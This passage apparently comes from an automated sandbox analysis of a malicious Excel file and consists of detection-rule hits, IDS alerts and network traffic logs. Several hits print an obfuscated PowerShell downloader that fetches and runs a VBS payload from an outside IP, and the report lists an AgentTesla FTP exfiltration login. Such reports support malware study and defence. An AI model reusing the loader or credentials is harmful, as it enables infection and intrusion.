Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2988, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , ProcessId: 3264, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2988, TargetFilename: C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1704, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", CommandLine: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQ
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2988, TargetFilename: C:\Users\user\AppData\Local\Temp\n1no2lop.boj.ps1

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2988, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline", ProcessId: 3160, ProcessName: csc.exe
                    Timestamp:07/03/24-18:03:46.611600
                    SID:2020424
                    Source Port:80
                    Destination Port:49172
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-18:03:28.517103
                    SID:2024449
                    Source Port:49168
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Attempted User Privilege Gain
                    Timestamp:07/03/24-18:03:45.426374
                    SID:2018856
                    Source Port:80
                    Destination Port:49171
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-18:03:26.763057
                    SID:2024449
                    Source Port:49166
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Attempted User Privilege Gain
                    Timestamp:07/03/24-18:03:45.748672
                    SID:2049038
                    Source Port:80
                    Destination Port:49171
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-18:03:45.506573
                    SID:2047750
                    Source Port:80
                    Destination Port:49171
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 12.2.powershell.exe.12778558.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxReversingLabs: Detection: 18%
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxJoe Sandbox ML: detected

                    Phishing

                    barindex
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\EvengIEcache[1].hta, type: DROPPED
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: RunPE.pdb source: powershell.exe, 0000000C.00000002.503385693.00000000002F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.504336170.0000000002713000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.pdbhP source: powershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.pdb source: powershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmp

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global trafficDNS query: name: hop.fyi
                    Source: global trafficDNS query: name: hop.fyi
                    Source: global trafficDNS query: name: hop.fyi
                    Source: global trafficDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 94.156.65.247:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
